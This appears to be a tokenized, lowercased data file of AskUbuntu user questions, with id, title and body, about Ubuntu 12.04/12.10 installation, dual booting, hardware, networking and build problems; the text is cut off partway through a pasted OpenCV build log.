258543	yet another dual boot issue win7x64 and 12.10	there are similar posts out there , but no answer that has helped me get this to work . though i consider myself savvy , i 'm newer to linux . system : amd fx , terabyte drive . i have 3 partitions on this drive - system , backup , and unallocated . the unallocated is for linux , but when i start live cd/usb and get to the `` do something else '' my ntfs partition does not show . it does show 1,000,000 free space . what am i doing wrong ? i just formatted my windows 7 partition and not having any luck . if more info is needed , please just ask . i 'm really hoping to get this working again http : //paste.ubuntu.com/1694495/ if this helps any ... .
258547	can not install in vm or through wubi	i 've tried vms and now wubi , and whenever i use a vm to install , i get `` must run in low graphics mode '' with a black screen or it freezes afterward . when i install on my real machine through wubi , i reboot into ubuntu , and i get the following : '' completing the ubuntu installation '' '' for more installation boot options , press 'esc ' now '' '' 0 '' '' _ '' it stays on this screen for as long as i have patience ( think an hour or more ) and then i just restart and boot into windows . all i have to do is download the appropriate wubi.exe and it does everything else , right ? i feel like i missed a `` download os '' step , even though i have the iso for 12.04 , and 12.10 .
258552	will ubuntu touch work on my tablet or phone ?	i have a kindle fire hd and want to know if the tablet version works or not . can it be used to take the place of the candle operating system ?
258555	dropping mouse events and unintentional drag and drop	i 'm running ubuntu 12.04 lts on an intel i7 system with 9gb ram and two monitors and i 'm using a logitech wireless mouse ( do n't have any further information about model ) . i have all of the latest updates applied and , with a set of updates applied this week ( prior to the most recent kernel update ) , i began experiencing erratic mouse events ( mouse_up not registering / mouse_down when not pressed ) , resulting in repeated unintentional drag-drop events and text highlighting / dragging affecting all applications . i 've replaced my mouse batteries in an attempt to fix the issue but no joy . i 've rebooted after applying the latest kernel update and still no improvement . i 'm beginning to think this may be a unity issue . i 'm curious whether anyone else is having this issue and whether there is any known resolution . thanks
258561	12.04 networkmanager trying to configure eth0 which is on a bridge	for months i 've been running 12.04 headless home server with a bridge connected through eth0 . i 've been using this /etc/network/interfaces file : auto lo iface lo inet loopback auto br0 iface br0 inet static address 192.168.8.1 netmask 255.255.255.0 network 192.168.8.0 broadcast 192.168.8.255 gateway 192.168.8.2 dns-nameservers 192.168.8.2 dns-search cluster.toy pre-up ip link set eth0 down pre-up brctl addbr br0 pre-up brctl addif br0 eth0 pre-up ip link set eth0 up post-down ip link set eth0 down post-down ip link set br0 down post-down brctl delif br0 eth0 post-down brctl delbr br0 however , after a weird network error i looked at my logs and saw that networkmanager was repeatedly trying to bring up eth0 , which it absolutely should not be doing ( eth0 is a slave to br0 , which is statically configured ) . my understanding is that since i have networkmanager.conf set with this setting : [ ifupdown ] managed=false it is supposed to ignore any interfaces mentioned in the /etc/network/interfaces file . so i have some questions : am i missing something , or is there a bug in networkmanager that it does n't parse bridge stanzas in /etc/network/interfaces correctly to know to ignore them ? is there some sort of dummy statement i now have to put in /etc/network/interfaces to trick network manager into leaving it alone ? alternatively , can i just apt-get remove network-manager with no negative consequences ?
258562	is ubuntu phone ( or tablet ) use x for display server ?	is ubuntu phone ( or tablet ) use x for display server ? if so , it should change the ubuntu desktop application to ubuntu phone ( or tablet ) its much easier for developers . if not , what display server is used ?
258569	dell inspiron 14 ( 3421 ) running windows 7 pro as default primary os and ubuntu as secondary os ?	i have a very legit query , my dell inspiron 14 ( 3421 ) system came pre-installed with ubuntu 12.04 lts as the primary os on the whole disk drive ( no partitions were made ) . so i made a recovery/backup disk of the dell ubuntu system and then formatted the whole system . i partitioned the disk to setup win 7 pro and now win 7 pro 64bit is perfectly loaded as the primary os . now i want ubuntu 12.04 lts/12.10 to be installed as the secondary os . how do i do that perfectly ? so what do i do now ? : ) a response to this would be appreciated .
258572	disk errors , then ca n't update anymore	so software update tells me it 's done some new upgrades for me . so i oblige , but then i get a weird error message saying that my disk is read-only or something . so i open a new terminal window to investigate . but i am greeted by mkdtemp : private socket dir : read-only file system so i rebooted . the computer greeted me with a message asking for a disk check . it found some errors , and i told it to automatically repair itself , which it did . i successfully booted in , this time without the mkdtemp error , and i am even able to use my apps normally . except now i ca n't update via software updater ; i only see this window pop up whenever i start the program : that 's fine , i guess , i will just use the good old command line , but amosjyng $ sudo apt-get upgrade amosjyng $ ckage lists ... 0 % it just crashes like that , too . then a window pops up telling me to report the error , which i try to do , but then the error reporter crashes too ... so what should i try now ? if worst comes to worst , i have /home on a separate partition , which is also backed up to external media , so i can just wipe the / drive . but i 'd really , really rather not have to set everything up again edit : apt-cache keeps crashing when the computer automatically checks for updates . heh .
258573	unity missing after update 12.10	after i downloaded and installed updates for 12.10 today i have no side bars/folders in unity . everything is missing except for my desktop background pic and the mouse cursor . i can still bring up the terminal and have already tried : unity -- reset this is meet with : error : the reset option is now deprecated i have tried ccsm also to no avail . when i try to enable/re-enable ubuntu utility plugin i get an error message-box saying some bindings conflict with other plugins . i have also tried reinstalling unity which did nothing as well . i am about out of ideas . please help .
258574	after ubuntu 12.10 install and restart	i installed the ubuntu in this pc in order to do a dual boot with windows . after installing ubuntu according to the tutorial it restarts the system , but it does n't show the grub `` boot selection '' menu . my other operating system , windows 7 starts . what should i do now ?
258579	help ! i disabled both of my monitors . what can i do ?	i am new to ubuntu . i was looking to see if double monitors were supported , and i accidentally disabled both of mine . what can i do ? i tried plugging in a third monitor , but nothing happened .
258580	how to run a script every time internet connects	i often mount a remote drive using sshfs . i would love to have this mount automatically . however , if i mount it in my .bashrc or startup scripts , the mount often fails because my wireless internet connection has not yet been made . does anybody know of an easy way to execute a bash scrip every time the connection is made , or to auto-mount an sshfs drive ?
258582	how to uninstall gmail app ? ( ubuntu 12.10 )	i was checking my gmail for the first time on firefox in ubuntu 12.10 and a message popped up asking something like , do i want to install the gmail app ? i clicked yes and it put a letter icon into the top right of my screen , i guess what you call the tray . anyway it turns out this app is completely useless and i now want to remove it , but i cant ! i 've looked under `` installed '' within the ubuntu software centre but it is n't there . help !
258588	how to move a file between deb packages ?	for example , imagine we have two packages : banana.deb and banana-common.deb . inside banana.deb , we have some file banana.data , that is quite big and changes rarely . both packages are currently at version 0.0.1 , and banana depends on banana-common . now , because we want to reduce banana.deb size , we want to move that banana.data file into banana-common package . if i just do that ( updating both versions to 0.0.2 and try to install with dpkg -i , i see the following : $ sudo dpkg -i banana-common.deb banana.deb ... dpkg : error processing banana-common.deb ( -- install ) : trying to overwrite '/usr/local/banana/banana.data ' , which is also in package banana 0.0.1 how can i fix it without removing the package first ?
258589	how do i enable system sounds ?	lately i noticed that there are n't any sounds ( beeps , boops , plinks , swooshes , etc . ) when i press buttons of any sort or if an event happens , such as opening/closing a tab in chromium , pressing a button in the system settings , the login jingle , etc . how do i enable these sounds ? as a note : i suppose this question is a duplicate of this question , but that question is about 11.10 , and the answer there did not solve my issue . i turned up the volume all the way in system settings - > sound - > sound effects , and my master volume is also turned up all the way . also , my sound does work , so that 's not the issue .
258590	what programs should i use to get a picture of resource usage on ubuntu ?	every now and then my computer gets completely unusable . so unusable i ca n't even open a terminal and run top to figure out what is going on . i want to create a script that collects data ( cpu usage , processes running , memory , disk usage , network usage , whatever else might be useful to a diagnostic ) so that i can reboot the computer and see what was going on . this script will probably run every 10 seconds or so . what program ( s ) should i use to obtain this information ? note : htop and iotop seem to only work in a interactive mode . this is bad if ( as i assume ) it prevents me from saving the data to a file gui programs might not be suitable , for the same reason ( and for creating difficulties in automation )
258592	how can i enable auto-switching hdmi sound on ubuntu 12.04 ?	i 've just installed ubuntu 12.04 on my lenovo g550 notebook and decided to test the main thing i use it for , on windows : watching movies and series on my living room tv . plugged in the hdmi cable , screen auto-configured nicely - awesome . but the sound is coming through my notebook 's speakers , instead of my tv . searched for almost an hour on google , found a couple of things - nothing that helped , though . here are two links that made me sad : another question on askubuntu '' a better sounding world '' post about hdmi on 2 , david says that autoswitching was disabled ... so how can i enable it ?
258601	please explain to me what a kernel is and how to load it on grub	background : please excuse bad grammar . english is not my first language . also explain the answer like i am five because i also know nothing about linux . i 'm a complete linux noob and i wanted to get it and try it out for my work . i do n't know any coding languages except for a bit of java . so i downloaded the windows installer version of ubuntu . it asked me to reboot and i rebooted . the problem : once it powered on , it gave me the option to select windows or ubuntu . i selected ubuntu right away and a black screen popped up and it kept running some lines of code i did n't understand . the lines kept running until it said signal 9 terminated ( killed ) and things like buffer error and medium error . this kept happening whenever i tried to boot . then after i shut it down enough times a command screen popped up called grub . i typed help and it gave me a full list of commands and what they did . i typed boot and it said something like you need to load the kernel first what help i need : so basically i know nothing about linux and it wo n't boot up and i have no idea what a kernel is or how to load it in grub . please explain like i am five how to load the kernel and boot up linux . thank you edit : heres my hardware since alot of you were asking . alienware m17x r4 gaming laptop 12 gigs of ram 1 terabyte of harddrive space amd radeon 7970m video card intel core i7 processor . so basically its a brand new 2,300 dollar gaming computer that i picked up a few months ago . its got all the newest hardware and i can run skyrim perfectly on ultra with roughly 15 graphics enhancing mods .
258604	how do i install steam on a 64bit system ?	i tried installing the ia32 libs by opening up a terminal and entering the following : sudo apt-get install ia32-libs but i was asked to put in a [ sudo ] password . i tried to type in something but nothing would show up . please help me !
258605	unable to change screen brightness on toshiba laptop ubuntu 12.04	i have a toshiba satellite c655d-s5209 with ubuntu 12.04 . i am unable to change the screen brightness . fn+f6 and fn+f7 move the brightness indicator , but actual brightness does not change . i have tried several fixes but none have worked so far : updated bios to newest version and updated graphics driver to latest version . tried editing grub about 100 times to include several suggested acpi options - none helped tried installing acpi and acpitools - did n't work so removed . tried installing fnfx and fnfx-client - did n't work so removed . tried editing xorg.conf - might have done something wrong with this because it broke my system , and had to use recovery mode . the screen hurts my eyes . either need a fix , some window tinting to put on my screen , or to reinstall windows .
258608	how can i get the current network traffic broken down by subnet	i 'm trying to modify one of my extensions that shows network traffic from my computer ( for an indicator ) . i 'd like to be able to quantify how much of the network traffic i see is coming/going to the internet , and how much is exchanged with my local subnet . is there any way to make this distinction in ubuntu using e.g . netstat ?
258613	getting error while installing ubuntu landscape	i have been trying to install ubuntu landscape server using this link https : //help.landscape.canonical.com/lds/quickstart and i am getting error in steps 6.in this above link canonical mention /etc/landscape/server.conf file which is not in my system . please help me for this
258616	how can i debug my wireless problem ?	how can i get started with debugging my wireless problem ? how can i tell whether or not linux has recognized my wireless hardware at all ? what are the main programs/daemons associated with wireless connectivity ? where are the log files for those programs ? do those programs have debug modes that i can access ? how can i tell whether a bug is in a userspace program or in a driver ? edit : this was originally a more complex question with other inquiries about wireless driver hacking and debugging . i have removed those bullet points and plan to create another question to cover them , possibly on unix & linux se .
258618	sync out of range during installation	i tried to install ubuntu at 1 of my cpu . the ubuntu version is ubuntu-12.10-desktop-i386 while my cpu using intel as the processor . i asked community in irc # ubuntu and they recommend me to check is my chip set sis 962l supported or not for ubuntu .
258619	libreoffice : lower part is not getting printed	i would like to ask , i 'm using ubuntu and when i 'm printing on libreoffice at paper size of ( long bond or american footscalp 13x8.5in ) the lower part is not getting printed . it prints all but about 3in from the bottom is not , even it is inside the printing area . but when i tried printing on windows using also libreoffice it works perfectly . it has the same thing with zorinos 6 and linuxmint nadia . it 's not a corrupted file which some says , i also tried saving the document in different formats and dowload printer driver for linux but still the problem occured . what do you think is the problem ? regarding comment : do you mean the bottom portion not getting printed due to page pixel problem or something else ? i do n't know if it is a pixel problem . it only happens on long bond size but in short bond size does n't . it stops printing to about 3inches from the bottom of the paper even it is still inside the printing area . the paper size during typing is set to long bond and so in printing .
258620	wifi gets disconnected again and again	i upgraded to ubuntu 12.10 from 10.10 and find that the wireless connection disconnects frequently . now , what to do ? my wifi device was running well okay with ubuntu 10.10 .
258621	how to make `lp` use the newer version of ghostscript ?	i am trying to print a document with the lp command . but ghostscript 8.71 get problems with this file . i upgrade the gs to the 9.07 version that does n't have problems . but when printing , the lp use the 8.71 version . i check it when debugging : d [ 20/feb/2013:01:31:51 -0500 ] [ job 11 ] gpl ghostscript 8.71 : failed to interpret tt instructions for glyph index 139 of font aimnao+erasmediumitc . continue ignoring instructions of the font . d [ 20/feb/2013:01:31:51 -0500 ] [ job 11 ] gpl ghostscript 8.71 : unrecoverable error , exit code 1 how can i make it use the 9.07 version ?
258622	is my hdd broken ?	i have an external usb hdd which i think is broken . when i plug it in nothing happens . can we confirm that is broken ? here is dmesg output : [ 7998.225453 ] usb 2-1.2 : usb disconnect , device number 10 [ 8013.506794 ] usb 2-1.2 : new high-speed usb device number 11 using ehci_hcd [ 8013.600080 ] usb 2-1.2 : new usb device found , idvendor=059f , idproduct=102a [ 8013.600092 ] usb 2-1.2 : new usb device strings : mfr=10 , product=11 , serialnumber=5 [ 8013.600099 ] usb 2-1.2 : product : lacie device [ 8013.600104 ] usb 2-1.2 : manufacturer : lacie [ 8013.600109 ] usb 2-1.2 : serialnumber : 6e16ffffffff [ 8013.601756 ] scsi7 : usb-storage 2-1.2:1.0 [ 8016.628008 ] scsi 7:0:0:0 : direct-access st950032 5as pq : 0 ansi : 2 ccs [ 8016.630465 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 8043.122441 ] not responding ... [ 8055.364940 ] sd 7:0:0:0 : [ sdb ] read capacity failed [ 8055.364954 ] sd 7:0:0:0 : [ sdb ] [ 8055.364961 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8055.364970 ] sd 7:0:0:0 : [ sdb ] [ 8055.364975 ] sense key : unit attention [ current ] [ 8055.364987 ] sd 7:0:0:0 : [ sdb ] [ 8055.364999 ] add . sense : not ready to ready change , medium may have changed [ 8059.448001 ] sd 7:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 8063.531287 ] sd 7:0:0:0 : [ sdb ] asking for cache data failed [ 8063.531299 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 8109.447663 ] not responding ... [ 8130.915342 ] sd 7:0:0:0 : [ sdb ] read capacity failed [ 8130.915348 ] sd 7:0:0:0 : [ sdb ] [ 8130.915351 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8130.915354 ] sd 7:0:0:0 : [ sdb ] [ 8130.915356 ] sense key : unit attention [ current ] [ 8130.915360 ] sd 7:0:0:0 : [ sdb ] [ 8130.915365 ] add . sense : not ready to ready change , medium may have changed [ 8139.081607 ] sd 7:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 8147.247893 ] sd 7:0:0:0 : [ sdb ] asking for cache data failed [ 8147.247899 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 8147.247903 ] sd 7:0:0:0 : [ sdb ] attached scsi disk
258623	cant download the windows installer - it downloads the iso instead	when trying to download the windows installer for ubuntu , it has me download the .iso instead . how can get the installer ? i have used it before , but this time its downloading the wrong file .
258625	blank screen after grub when booting from live cd	i 'm trying to install kubuntu to dual boot with windows 8 on my laptop from a cd i burned , but selecting any option from the grub menu causes a blank screen , and the cd drive stops after a short while . the md5 of the .iso was correct and i ran the check utility on the cd on another computer and it found no errors . the other computer is also able to load the installer . i found several dozen solutions to similar problems that have n't worked for me , most people seem to be able to get past the grub menu and get a black screen after they try to boot the os . on the laptop i 'm trying to install on , booting from the cd goes directly to the grub menu , with the options `` start kubuntu / oem installation ( for manufacturers ) / check disk for errors '' . choosing any of these simply goes to a blank screen , and does n't ( seem to ) read anything from the disk . per this , i tried changing the end of the linux boot command from quiet splash to -- verbose single , but the example in that thread used a different boot command to begin with . i 've also seen a lot of talk about nomodeset , but that seems to relate to something later in the process . i have integrated graphics ( on intel ) , and the disk is a dvd-r. any suggestions ?
258626	gnome3 install fail on 12.10	i recently upgraded to 12.10 and found it was running a little slow . my laptop is a few years old and so i accept that the issue is probably my hardware . when looking online i found it mentioned on many sites that installing gnome3 would ( or should ) give me back my speed . i found a few tutorials on you tube and they all used the same methods to get the install done . i followed these and the system worked fine - until i restarted . i began to lose functions one at a time and now can not boot back into ubuntu at all . i have a windows 8 dual boot . windows 8 is still working as well as it was before . i can boot up ok to the login screen . i can login as a guest and have function - just no access to my files . when i try to log in as my username i get as far as loading the background and it stops . this is in unity , gnome , gnome classic and gnome classic w/o frills . what have i done wrong ? how do i recover back to the start without losing files ? any help appreciated .
258627	uninstall ubuntu with no boot problem afterward	i 'm trying to install ubuntu on my laptop ( probook 4331s ) that comes with preinstalled win7 , so i have no recovery cd or something , but somehow it has recovery hd , separated from hd c & d. so far , the only way i knew to uninstall ubuntu was , by deleting the ubuntu 's partition , from win7 . but it 's damaging the boot loader . once i read about installing `` easybcd 2.2 '' and make use of it before deleting the ubuntu partition . then i checked here and there , even there 's some problem arose from using `` easybcd 2.2 '' . so i 'm asking opinion , using `` easybcd 2.2 '' is the right way in avoid booting messed up when uninstalling ubuntu by deleting its partition , even without recovery cd ?
258632	does following `man sudo root` permenantly blocks your sudo ?	i needed to enable the root account for whatever reason and being offline i had no better advice than this manual man sudo root '' this is not recommended ! to enable the root account ( i.e . set a password ) use : sudo passwd root afterwards , edit /etc/sudoers and comment out the line % admin all= ( all ) all to disable sudo access to members of the admin group . '' so i followed the two steps and the result was i still could n't access the root account because i did n't activate it in the login screen , only now i also lost the admin rights to my default user which left me in a permission limbo , since then i edited the sudoers from a cd boot and restored the settings but still ... was the manual really a bad advice or was there a better way than this to revert or complete the process ?
258640	how to add a space from outside an extended partition to a logical partition contained in the extended partition ?	first , my partitioning looks like so : i do not like how it looks , and am not sure how i came up with that extended partition sda3 [ ** ] which i do not need , but it did not bother me initially , so i continued with that structure . at a certain point i have shrunk the windows partition and used the new partition to test different linux-es . now , that is called sda2 . i am not sure if i use the terminology properly , but sda2 is my only linux partition outside the large extended partition . ( as far as i understand it , an extended partition is like a container for smaller partitions : in a way sda3 contains and is formed by sda5 , 6 and7 . ) i have used sda2 to test different linux os-es . at a certain point , when sda7 was not a system partition , but an empty one , i have tried to enlarge sda2 into sda7 but this was not possible - i think because sda7 was within the extended partition sda3 . so , i just copy/pasted the sda2 , which was a system partition into the free sda7 ( with gparted ) and in this way have transferred the system to a larger partition . but now i would like to enlarge even more sda7 ( now my system partition ) : and can not do it . i would like to use sda2 which now is separated and kind of useless . sda5 is a space to deposit files . my question is : is it possible to change this structure of my partitions so as to add sda2 space to my system partition sda7 without having to remove my system - that is : without formatting sda7 and sda5 ? i am familiar with gparted booting from external usb and with boot repair . so , i do not mind if solving this would corrupt the grub , i could restore it later with boot repair . i just want to now what would be the chances of adding the space of sda2 to the system partition . [ **i am under the impression , although not really sure , that the structure of sda3 as extended partition is the result of the manipulations made while installing/testing different linux-es on sda2 and that the partitioning program of the system installer was able to change the record entries of what now are sda5 , 6 and 7 without formatting them : so , i hope to do something like that from a bootable gparted usb ] .
258642	hidden files always being shown	when opening a folder , by default it always shows hidden files . i can uncheck the view option and they disappear but reappear on the next opening with the hidden files option re-checked . have i inadvertently changed an option or is this a bug ? no-one else seems to have encountered this .
258645	how to revert ubuntu updates and installs to specific time ?	title may no be clear , i want to revert all updates and installations from my ubuntu to specific time . i have two netbeans on it with different version numbers . i want to revert all updates and installations since the day i installed second netbeans . how can i achieve this ?
258646	ubuntu gui in vmware looks strange	i installed ubuntu 12.10 on vmware and this is how the gui looks after startup . i re-installed it a couple of time but the problem persists . first i tried installing while getting the files from the internet , the language packs , etc and when i saw that the gui is strange , reinstalled it - this time quick one - without the language packs but the gui is still messed i do not know what is causing the problem . how do i get it to work normally ? other : host os : windows 7 home premium 32 bit total ram : 2gb ram allocated to vm : 512 mb .
258648	'libavformat/avformat.h : no such file or directory ' while compiling opencv for arm a8	i am using ubuntu 12.04 . i get errors while cross-compiling opencv for arm a8 . can someone help to resolve ? $ make scanning dependencies of target zlib [ 0 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/adler32.c.o [ 0 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/compress.c.o [ 0 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/crc32.c.o [ 0 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/deflate.c.o [ 0 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/gzclose.c.o [ 0 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/gzlib.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/gzread.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/gzwrite.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/inflate.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/infback.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/inftrees.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/inffast.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/trees.c.o [ 1 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/uncompr.c.o [ 2 % ] building c object 3rdparty/zlib/cmakefiles/zlib.dir/zutil.c.o linking c static library ../lib/libzlib.a [ 2 % ] built target zlib scanning dependencies of target libtiff [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_aux.c.o [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_close.c.o [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_codec.c.o [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_color.c.o [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_compress.c.o [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_dir.c.o [ 2 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_dirinfo.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_dirread.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_dirwrite.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_dumpmode.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_error.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_extension.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_fax3.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_fax3sm.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_flush.c.o [ 3 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_getimage.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_jbig.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_jpeg_12.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_jpeg.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_luv.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_lzma.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_lzw.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_next.c.o [ 4 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_ojpeg.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_open.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_packbits.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_pixarlog.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_predict.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_print.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_read.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_strip.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_swab.c.o [ 5 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_thunder.c.o [ 6 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_tile.c.o [ 6 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_version.c.o [ 6 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_warning.c.o [ 6 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_write.c.o [ 6 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_zip.c.o [ 6 % ] building cxx object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_stream.cxx.o [ 6 % ] building c object 3rdparty/libtiff/cmakefiles/libtiff.dir/tif_unix.c.o linking cxx static library ../lib/liblibtiff.a [ 6 % ] built target libtiff scanning dependencies of target libjpeg [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcdctmgr.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdmaster.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcmaster.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdhuff.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jidctred.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdatasrc.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdpostct.c.o [ 6 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdatadst.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jddctmgr.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdtrans.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jfdctfst.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdmerge.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdmarker.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jerror.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcapimin.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jccolor.c.o [ 7 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcapistd.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdphuff.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jmemmgr.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcparam.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jutils.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jccoefct.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/transupp.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jchuff.c.o [ 8 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdapistd.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdcolor.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcomapi.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jfdctflt.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdsample.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jfdctint.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jquant1.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcprepct.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jquant2.c.o [ 9 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcmainct.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jctrans.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jidctfst.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdcoefct.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdapimin.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcphuff.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdmainct.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jidctint.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jidctflt.c.o [ 10 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jmemansi.c.o [ 11 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jdinput.c.o [ 11 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcsample.c.o [ 11 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcinit.c.o [ 11 % ] building c object 3rdparty/libjpeg/cmakefiles/libjpeg.dir/jcmarker.c.o linking c static library ../lib/liblibjpeg.a [ 11 % ] built target libjpeg scanning dependencies of target libjasper [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_bs.c.o [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_stream.c.o [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jp2_dec.c.o [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_mqcod.c.o [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_t1dec.c.o [ 11 % ] building c object 